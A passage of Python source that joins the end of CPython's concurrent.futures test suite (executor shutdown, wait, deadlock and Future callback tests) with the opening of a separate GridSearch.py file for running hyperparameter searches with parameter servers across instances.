and from this point submit() is guaranteed to fail with self.assertRaises(BrokenExecutor): self.executor.submit(get_init_status) def _prime_executor(self): pass @contextlib.contextmanager def _assert_logged(self, msg): if self.log_queue is not None: yield output = [] try: while True: output.append(self.log_queue.get_nowait().getMessage()) except queue.Empty: pass else: with self.assertLogs('concurrent.futures', 'CRITICAL') as cm: yield output = cm.output self.assertTrue(any(msg in line for line in output), output) create_executor_tests(InitializerMixin) create_executor_tests(FailingInitializerMixin) class ExecutorShutdownTest: def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print if __name__ == "__main__": context = '{context}' if context == "": t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertFalse(err) self.assertEqual(out.strip(), b"apple") def test_submit_after_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: import atexit @atexit.register def run_last(): try: t.submit(id, None) except RuntimeError: print("runtime-error") raise from concurrent.futures import {executor_type} if __name__ == "__main__": context = '{context}' if not context: t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(id, 42).result() """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. 
self.assertIn("RuntimeError: cannot schedule new futures", err.decode()) self.assertEqual(out.strip(), b"runtime-error") def test_hang_issue12364(self): fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)] self.executor.shutdown() for f in fs: f.result() class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase): def _prime_executor(self): pass def test_threads_terminate(self): def acquire_lock(lock): lock.acquire() sem = threading.Semaphore(0) for i in range(3): self.executor.submit(acquire_lock, sem) self.assertEqual(len(self.executor._threads), 3) for i in range(3): sem.release() self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: t.join() def test_thread_names_assigned(self): executor = futures.ThreadPoolExecutor( max_workers=5, thread_name_prefix='SpecialPool') executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: self.assertRegex(t.name, r'^SpecialPool_[0-4]$') t.join() def test_thread_names_default(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: # Ensure that our default name is reasonably sane and unique when # no thread_name_prefix was supplied. self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$') t.join() class ProcessPoolShutdownTest(ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes.values(): p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes.values(): p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes call_queue = executor._call_queue queue_management_thread = executor._queue_management_thread del executor # Make sure that all the executor resources were properly cleaned by # the shutdown process queue_management_thread.join() for p in processes.values(): p.join() call_queue.join_thread() create_executor_tests(ProcessPoolShutdownTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class WaitTests: def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1], 
return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 6) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase): def test_pending_calls_race(self): # Issue #14406: multi-threaded race condition when waiting on all # futures. event = threading.Event() def future_func(): event.wait() oldswitchinterval = sys.getswitchinterval() sys.setswitchinterval(1e-6) try: fs = {self.executor.submit(future_func) for i in range(100)} event.set() futures.wait(fs, return_when=futures.ALL_COMPLETED) finally: sys.setswitchinterval(oldswitchinterval) create_executor_tests(WaitTests, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class AsCompletedTests: # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. 
def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) def test_duplicate_futures(self): # Issue 20367. Duplicate futures should not raise exceptions or give # duplicate responses. # Issue #31641: accept arbitrary iterables. future1 = self.executor.submit(time.sleep, 2) completed = [ f for f in futures.as_completed(itertools.repeat(future1, 3)) ] self.assertEqual(len(completed), 1) def test_free_reference_yielded_future(self): # Issue #14406: Generator should not keep references # to finished futures. futures_list = [Future() for _ in range(8)] futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED)) futures_list.append(create_future(state=FINISHED, result=42)) with self.assertRaises(futures.TimeoutError): for future in futures.as_completed(futures_list, timeout=0): futures_list.remove(future) wr = weakref.ref(future) del future self.assertIsNone(wr()) futures_list[0].set_result("test") for future in futures.as_completed(futures_list): futures_list.remove(future) wr = weakref.ref(future) del future self.assertIsNone(wr()) if futures_list: futures_list[0].set_result("test") def test_correct_timeout_exception_msg(self): futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE, RUNNING_FUTURE, SUCCESSFUL_FUTURE] with self.assertRaises(futures.TimeoutError) as cm: list(futures.as_completed(futures_list, timeout=0)) self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished') create_executor_tests(AsCompletedTests) class ExecutorTest: # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. 
def test_submit(self): future = self.executor.submit(pow, 2, 8) self.assertEqual(256, future.result()) def test_submit_keyword(self): future = self.executor.submit(mul, 2, y=8) self.assertEqual(16, future.result()) future = self.executor.submit(capture, 1, self=2, fn=3) self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3})) with self.assertRaises(TypeError): self.executor.submit(fn=capture, arg=1) with self.assertRaises(TypeError): self.executor.submit(arg=1) def test_map(self): self.assertEqual( list(self.executor.map(pow, range(10), range(10))), list(map(pow, range(10), range(10)))) self.assertEqual( list(self.executor.map(pow, range(10), range(10), chunksize=3)), list(map(pow, range(10), range(10)))) def test_map_exception(self): i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5]) self.assertEqual(i.__next__(), (0, 1)) self.assertEqual(i.__next__(), (0, 1)) self.assertRaises(ZeroDivisionError, i.__next__) def test_map_timeout(self): results = [] try: for i in self.executor.map(time.sleep, [0, 0, 6], timeout=5): results.append(i) except futures.TimeoutError: pass else: self.fail('expected TimeoutError') self.assertEqual([None, None], results) def test_shutdown_race_issue12456(self): # Issue #12456: race condition at shutdown where trying to post a # sentinel in the call queue blocks (the queue is full while processes # have exited). self.executor.map(str, [2] * (self.worker_count + 1)) self.executor.shutdown() @support.cpython_only def test_no_stale_references(self): # Issue #16284: check that the executors don't unnecessarily hang onto # references. my_object = MyObject() my_object_collected = threading.Event() my_object_callback = weakref.ref( my_object, lambda obj: my_object_collected.set()) # Deliberately discarding the future. self.executor.submit(my_object.my_method) del my_object collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT) self.assertTrue(collected, "Stale reference not collected within timeout.") def test_max_workers_negative(self): for number in (0, -1): with self.assertRaisesRegex(ValueError, "max_workers must be greater " "than 0"): self.executor_type(max_workers=number) def test_free_reference(self): # Issue #14406: Result iterator should not keep an internal # reference to result objects. 
for obj in self.executor.map(make_dummy_object, range(10)): wr = weakref.ref(obj) del obj self.assertIsNone(wr()) class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase): def test_map_submits_without_iteration(self): """Tests verifying issue 11777.""" finished = [] def record_finished(n): finished.append(n) self.executor.map(record_finished, range(10)) self.executor.shutdown(wait=True) self.assertCountEqual(finished, range(10)) def test_default_workers(self): executor = self.executor_type() expected = min(32, (os.cpu_count() or 1) + 4) self.assertEqual(executor._max_workers, expected) def test_saturation(self): executor = self.executor_type(4) def acquire_lock(lock): lock.acquire() sem = threading.Semaphore(0) for i in range(15 * executor._max_workers): executor.submit(acquire_lock, sem) self.assertEqual(len(executor._threads), executor._max_workers) for i in range(15 * executor._max_workers): sem.release() executor.shutdown(wait=True) def test_idle_thread_reuse(self): executor = self.executor_type() executor.submit(mul, 21, 2).result() executor.submit(mul, 6, 7).result() executor.submit(mul, 3, 14).result() self.assertEqual(len(executor._threads), 1) executor.shutdown(wait=True) class ProcessPoolExecutorTest(ExecutorTest): @unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit') def test_max_workers_too_large(self): with self.assertRaisesRegex(ValueError, "max_workers must be <= 61"): futures.ProcessPoolExecutor(max_workers=62) def test_killed_child(self): # When a child process is abruptly terminated, the whole pool gets # "broken". futures = [self.executor.submit(time.sleep, 3)] # Get one of the processes, and terminate (kill) it p = next(iter(self.executor._processes.values())) p.terminate() for fut in futures: self.assertRaises(BrokenProcessPool, fut.result) # Submitting other jobs fails as well. self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8) def test_map_chunksize(self): def bad_map(): list(self.executor.map(pow, range(40), range(40), chunksize=-1)) ref = list(map(pow, range(40), range(40))) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=6)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=50)), ref) self.assertEqual( list(self.executor.map(pow, range(40), range(40), chunksize=40)), ref) self.assertRaises(ValueError, bad_map) @classmethod def _test_traceback(cls): raise RuntimeError(123) # some comment def test_traceback(self): # We want ensure that the traceback from the child process is # contained in the traceback raised in the main process. 
future = self.executor.submit(self._test_traceback) with self.assertRaises(Exception) as cm: future.result() exc = cm.exception self.assertIs(type(exc), RuntimeError) self.assertEqual(exc.args, (123,)) cause = exc.__cause__ self.assertIs(type(cause), futures.process._RemoteTraceback) self.assertIn('raise RuntimeError(123) # some comment', cause.tb) with support.captured_stderr() as f1: try: raise exc except RuntimeError: sys.excepthook(*sys.exc_info()) self.assertIn('raise RuntimeError(123) # some comment', f1.getvalue()) def test_ressources_gced_in_workers(self): # Ensure that argument for a job are correctly gc-ed after the job # is finished obj = EventfulGCObj(self.ctx) future = self.executor.submit(id, obj) future.result() self.assertTrue(obj.event.wait(timeout=1)) create_executor_tests(ProcessPoolExecutorTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) def hide_process_stderr(): import io sys.stderr = io.StringIO() def _crash(delay=None): """Induces a segfault.""" if delay: time.sleep(delay) import faulthandler faulthandler.disable() faulthandler._sigsegv() def _exit(): """Induces a sys exit with exitcode 1.""" sys.exit(1) def _raise_error(Err): """Function that raises an Exception in process.""" hide_process_stderr() raise Err() def _return_instance(cls): """Function that returns a instance of cls.""" hide_process_stderr() return cls() class CrashAtPickle(object): """Bad object that triggers a segfault at pickling time.""" def __reduce__(self): _crash() class CrashAtUnpickle(object): """Bad object that triggers a segfault at unpickling time.""" def __reduce__(self): return _crash, () class ExitAtPickle(object): """Bad object that triggers a process exit at pickling time.""" def __reduce__(self): _exit() class ExitAtUnpickle(object): """Bad object that triggers a process exit at unpickling time.""" def __reduce__(self): return _exit, () class ErrorAtPickle(object): """Bad object that triggers an error at pickling time.""" def __reduce__(self): from pickle import PicklingError raise PicklingError("Error in pickle") class ErrorAtUnpickle(object): """Bad object that triggers an error at unpickling time.""" def __reduce__(self): from pickle import UnpicklingError return _raise_error, (UnpicklingError, ) class ExecutorDeadlockTest: TIMEOUT = support.SHORT_TIMEOUT @classmethod def _sleep_id(cls, x, delay): time.sleep(delay) return x def _fail_on_deadlock(self, executor): # If we did not recover before TIMEOUT seconds, consider that the # executor is in a deadlock state and forcefully clean all its # composants. import faulthandler from tempfile import TemporaryFile with TemporaryFile(mode="w+") as f: faulthandler.dump_traceback(file=f) f.seek(0) tb = f.read() for p in executor._processes.values(): p.terminate() # This should be safe to call executor.shutdown here as all possible # deadlocks should have been broken. executor.shutdown(wait=True) print(f"\nTraceback:\n {tb}", file=sys.__stderr__) self.fail(f"Executor deadlock:\n\n{tb}") def test_crash(self): # extensive testing for deadlock caused by crashes in a pool. 
self.executor.shutdown(wait=True) crash_cases = [ # Check problem occurring while pickling a task in # the task_handler thread (id, (ErrorAtPickle(),), PicklingError, "error at task pickle"), # Check problem occurring while unpickling a task on workers (id, (ExitAtUnpickle(),), BrokenProcessPool, "exit at task unpickle"), (id, (ErrorAtUnpickle(),), BrokenProcessPool, "error at task unpickle"), (id, (CrashAtUnpickle(),), BrokenProcessPool, "crash at task unpickle"), # Check problem occurring during func execution on workers (_crash, (), BrokenProcessPool, "crash during func execution on worker"), (_exit, (), SystemExit, "exit during func execution on worker"), (_raise_error, (RuntimeError, ), RuntimeError, "error during func execution on worker"), # Check problem occurring while pickling a task result # on workers (_return_instance, (CrashAtPickle,), BrokenProcessPool, "crash during result pickle on worker"), (_return_instance, (ExitAtPickle,), SystemExit, "exit during result pickle on worker"), (_return_instance, (ErrorAtPickle,), PicklingError, "error during result pickle on worker"), # Check problem occurring while unpickling a task in # the result_handler thread (_return_instance, (ErrorAtUnpickle,), BrokenProcessPool, "error during result unpickle in result_handler"), (_return_instance, (ExitAtUnpickle,), BrokenProcessPool, "exit during result unpickle in result_handler") ] for func, args, error, name in crash_cases: with self.subTest(name): # The captured_stderr reduces the noise in the test report with support.captured_stderr(): executor = self.executor_type( max_workers=2, mp_context=get_context(self.ctx)) res = executor.submit(func, *args) with self.assertRaises(error): try: res.result(timeout=self.TIMEOUT) except futures.TimeoutError: # If we did not recover before TIMEOUT seconds, # consider that the executor is in a deadlock state self._fail_on_deadlock(executor) executor.shutdown(wait=True) def test_shutdown_deadlock(self): # Test that the pool calling shutdown do not cause deadlock # if a worker fails after the shutdown call. 
self.executor.shutdown(wait=True) with self.executor_type(max_workers=2, mp_context=get_context(self.ctx)) as executor: self.executor = executor # Allow clean up in fail_on_deadlock f = executor.submit(_crash, delay=.1) executor.shutdown(wait=True) with self.assertRaises(BrokenProcessPool): f.result() create_executor_tests(ExecutorDeadlockTest, executor_mixins=(ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)) class FutureTests(BaseTestCase): def test_done_callback_with_result(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.add_done_callback(fn) f.set_result(5) self.assertEqual(5, callback_result) def test_done_callback_with_exception(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.add_done_callback(fn) f.set_exception(Exception('test')) self.assertEqual(('test',), callback_exception.args) def test_done_callback_with_cancel(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() f.add_done_callback(fn) self.assertTrue(f.cancel()) self.assertTrue(was_cancelled) def test_done_callback_raises(self): with support.captured_stderr() as stderr: raising_was_called = False fn_was_called = False def raising_fn(callback_future): nonlocal raising_was_called raising_was_called = True raise Exception('doh!') def fn(callback_future): nonlocal fn_was_called fn_was_called = True f = Future() f.add_done_callback(raising_fn) f.add_done_callback(fn) f.set_result(5) self.assertTrue(raising_was_called) self.assertTrue(fn_was_called) self.assertIn('Exception: doh!', stderr.getvalue()) def test_done_callback_already_successful(self): callback_result = None def fn(callback_future): nonlocal callback_result callback_result = callback_future.result() f = Future() f.set_result(5) f.add_done_callback(fn) self.assertEqual(5, callback_result) def test_done_callback_already_failed(self): callback_exception = None def fn(callback_future): nonlocal callback_exception callback_exception = callback_future.exception() f = Future() f.set_exception(Exception('test')) f.add_done_callback(fn) self.assertEqual(('test',), callback_exception.args) def test_done_callback_already_cancelled(self): was_cancelled = None def fn(callback_future): nonlocal was_cancelled was_cancelled = callback_future.cancelled() f = Future() self.assertTrue(f.cancel()) f.add_done_callback(fn) self.assertTrue(was_cancelled) def test_done_callback_raises_already_succeeded(self): with support.captured_stderr() as stderr: def raising_fn(callback_future): raise Exception('doh!') f = Future() # Set the result first to simulate a future that runs instantly, # effectively allowing the callback to be run immediately. 
f.set_result(5) f.add_done_callback(raising_fn) self.assertIn('exception calling callback for', stderr.getvalue()) self.assertIn('doh!', stderr.getvalue()) def test_repr(self): self.assertRegex(repr(PENDING_FUTURE), '<Future at 0x[0-9a-f]+ state=pending>') self.assertRegex(repr(RUNNING_FUTURE), '<Future at 0x[0-9a-f]+ state=running>') self.assertRegex(repr(CANCELLED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE), '<Future at 0x[0-9a-f]+ state=cancelled>') self.assertRegex( repr(EXCEPTION_FUTURE), '<Future at 0x[0-9a-f]+ state=finished raised OSError>') self.assertRegex( repr(SUCCESSFUL_FUTURE), '<Future at 0x[0-9a-f]+ state=finished returned int>') def test_cancel(self): f1 = create_future(state=PENDING) f2 = create_future(state=RUNNING) f3 = create_future(state=CANCELLED) f4 = create_future(state=CANCELLED_AND_NOTIFIED) f5 = create_future(state=FINISHED, exception=OSError()) f6 = create_future(state=FINISHED, result=5) self.assertTrue(f1.cancel()) self.assertEqual(f1._state, CANCELLED) self.assertFalse(f2.cancel()) self.assertEqual(f2._state, RUNNING) self.assertTrue(f3.cancel()) self.assertEqual(f3._state, CANCELLED) self.assertTrue(f4.cancel()) self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED) self.assertFalse(f5.cancel()) self.assertEqual(f5._state, FINISHED) self.assertFalse(f6.cancel()) self.assertEqual(f6._state, FINISHED) def test_cancelled(self): self.assertFalse(PENDING_FUTURE.cancelled()) self.assertFalse(RUNNING_FUTURE.cancelled()) self.assertTrue(CANCELLED_FUTURE.cancelled()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled()) self.assertFalse(EXCEPTION_FUTURE.cancelled()) self.assertFalse(SUCCESSFUL_FUTURE.cancelled()) def test_done(self): self.assertFalse(PENDING_FUTURE.done()) self.assertFalse(RUNNING_FUTURE.done()) self.assertTrue(CANCELLED_FUTURE.done()) self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done()) self.assertTrue(EXCEPTION_FUTURE.done()) self.assertTrue(SUCCESSFUL_FUTURE.done()) def test_running(self): self.assertFalse(PENDING_FUTURE.running()) self.assertTrue(RUNNING_FUTURE.running()) self.assertFalse(CANCELLED_FUTURE.running()) self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running()) self.assertFalse(EXCEPTION_FUTURE.running()) self.assertFalse(SUCCESSFUL_FUTURE.running()) def test_result_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.result, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.result, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0) self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0) self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42) def test_result_with_success(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. time.sleep(1) f1.set_result(42) f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertEqual(f1.result(timeout=5), 42) t.join() def test_result_with_cancel(self): # TODO(brian@sweetapp.com): This test is timing dependent. def notification(): # Wait until the main thread is waiting for the result. 
time.sleep(1) f1.cancel() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertRaises(futures.CancelledError, f1.result, timeout=support.SHORT_TIMEOUT) t.join() def test_exception_with_timeout(self): self.assertRaises(futures.TimeoutError, PENDING_FUTURE.exception, timeout=0) self.assertRaises(futures.TimeoutError, RUNNING_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_FUTURE.exception, timeout=0) self.assertRaises(futures.CancelledError, CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0) self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0), OSError)) self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None) def test_exception_with_success(self): def notification(): # Wait until the main thread is waiting for the exception. time.sleep(1) with f1._condition: f1._state = FINISHED f1._exception = OSError() f1._condition.notify_all() f1 = create_future(state=PENDING) t = threading.Thread(target=notification) t.start() self.assertTrue(isinstance(f1.exception(timeout=support.SHORT_TIMEOUT), OSError)) t.join() def test_multiple_set_result(self): f = create_future(state=PENDING) f.set_result(1) with self.assertRaisesRegex( futures.InvalidStateError, 'FINISHED: <Future at 0x[0-9a-f]+ ' 'state=finished returned int>' ): f.set_result(2) self.assertTrue(f.done()) self.assertEqual(f.result(), 1) def test_multiple_set_exception(self): f = create_future(state=PENDING) e = ValueError() f.set_exception(e) with self.assertRaisesRegex( futures.InvalidStateError, 'FINISHED: <Future at 0x[0-9a-f]+ ' 'state=finished raised ValueError>' ): f.set_exception(Exception()) self.assertEqual(f.exception(), e) _threads_key = None def setUpModule(): global _threads_key _threads_key = support.threading_setup() def tearDownModule(): support.threading_cleanup(*_threads_key) multiprocessing.util._cleanup_tests() if __name__ == "__main__": unittest.main()
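The FutureTests above pin down the done-callback contract of concurrent.futures. As a standalone illustration (not part of the test module above), the sketch below shows the two behaviours most of those tests rely on: a callback fires when its future finishes, and a callback added to an already-finished future runs immediately in the caller's thread.

from concurrent.futures import ThreadPoolExecutor

def report(fut):
    # The callback always receives the finished Future itself.
    print("result:", fut.result())

with ThreadPoolExecutor(max_workers=1) as executor:
    f = executor.submit(pow, 2, 8)
    f.add_done_callback(report)   # runs once the worker completes the call
    print(f.result())             # 256
    f.add_done_callback(report)   # future already done: runs immediately, here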
GridSearch.py
import itertools import logging import os import threading import time import boto3 import math import graph from utils import * import automate import configuration import parameter_server logging.basicConfig(filename="cirrusbundle.log", level=logging.WARNING) class GridSearch(object): # All searches that are currently running. _running_searches = [] @classmethod def kill_all_searches(cls): for search in list(cls._running_searches): search.kill_all() # TODO: Add some sort of optional argument checking def __init__(self, task=None, param_base=None, hyper_vars=[], hyper_params=[], instances=[], num_jobs=1, timeout=-1, ): # Private Variables self.cirrus_objs = [] # Stores each singular experiment self.infos = [] # Stores metadata associated with each experiment self.param_lst = [] # Stores parameters of each experiment self.check_queue = [] # Queue for checking error/lambdas for each object self.threads = [] self.kill_signal = threading.Event() self.loss_lst = [] self.start_time = time.time() # User inputs self.set_timeout = timeout # Timeout. -1 means never timeout self.num_jobs = num_jobs # Number of threads checking check_queue self.hyper_vars = hyper_vars self.instances = instances # Setup self.set_task_parameters( task, param_base=param_base, hyper_vars=hyper_vars, hyper_params=hyper_params, instances=instances) self.adjust_num_threads() def adjust_num_threads(self): # make sure we don't have more threads than experiments self.num_jobs = min(self.num_jobs, len(self.cirrus_objs)) # User must either specify param_dict_lst, or hyper_vars, hyper_params, and param_base def set_task_parameters(self, task, param_base=None, hyper_vars=[], hyper_params=[], instances=[]): possibilities = list(itertools.product(*hyper_params)) base_port = 1337 index = 0 num_machines = len(instances) for i, p in enumerate(possibilities): configuration = zip(hyper_vars, p) modified_config = param_base.copy() for var_name, var_value in configuration: modified_config[var_name] = var_value modified_config["ps"] = parameter_server.ParameterServer( instances[index], base_port, base_port+1, modified_config["n_workers"]) index = (index + 1) % num_machines base_port += 2 modified_config["experiment_id"] = i c = task(**modified_config) self.cirrus_objs.append(c) self.infos.append({'color': get_random_color()}) self.loss_lst.append({}) self.param_lst.append(modified_config) # Fetches custom metadata from experiment i def get_info_for(self, i): string = "" for param_name in self.hyper_vars: string += "%s: %s\n" % (param_name, str(self.param_lst[i][param_name])) return string def get_name_for(self, i): out = self.cirrus_objs[i].get_name() return out def get_cost(self): cost = 0 for i in range(len(self.param_lst)): c = self.cirrus_objs[i] cost += c.cost_model.get_cost(time.time() - self.start_time) return cost def get_cost_per_sec(self): return sum([c.cost_model.get_cost_per_second() for c in self.cirrus_objs]) def get_num_lambdas(self): return sum([c.get_num_lambdas(fetch=False) for c in self.cirrus_objs]) # Gets x-axis values of specified metric from experiment i def get_xs_for(self, i, metric): lst = self.cirrus_objs[i].fetch_metric(metric) return [item[0] for item in lst] # Helper method that collapses a list of commands into a single one def get_total_command(self): cmd_lst = [] for c in self.cirrus_objs: cmd_lst.append(c.get_command()) return ' '.join(cmd_lst) # TODO: Fix duplicate methods def get_ys_for(self, i, metric): lst = self.cirrus_objs[i].fetch_metric(metric) return [item[1] for item in lst] def 
start_queue_threads(self):
    # Function that checks each experiment to restore lambdas, grab metrics
    def custodian(cirrus_objs, thread_id, num_jobs):
        index = thread_id
        logging.info("Custodian number %d starting..." % thread_id)
        start_time = time.time()
        time.sleep(5)  # HACK: Sleep for 5 seconds to wait for PS to start
        while self.custodians_should_continue:
            cirrus_obj = cirrus_objs[index]
            loss = cirrus_obj.get_time_loss()
            self.loss_lst[index] = loss
            # Use %s placeholders: passing extra positional arguments without them
            # makes the logging module raise a formatting error instead of logging.
            logging.info("Thread %s exp %s loss %s", thread_id, index, self.loss_lst[index])
            round_loss_lst = [(round(a, 3), round(float(b), 4)) for (a, b) in self.loss_lst[index]]
            logging.debug("Thread %s exp %s loss %s", thread_id, index, round_loss_lst)
            index += num_jobs
            if index >= len(cirrus_objs):
                index = thread_id
                time.sleep(0.5)
                start_time = time.time()

    def unbuffer_instance(instance):
        status, stdout, stderr = instance.buffer_commands(False)
        if status != 0:
            print("An error occurred while unbuffering commands on an"
                  " instance. The exit code was %d and the stderr was:" % status)
            print(stderr)
            raise RuntimeError("An error occurred while unbuffering"
                               " commands on an instance.")

    for instance in self.instances:
        instance.buffer_commands(True)
    for cirrus_obj in self.cirrus_objs:
        cirrus_obj.run(False)
    threads = []
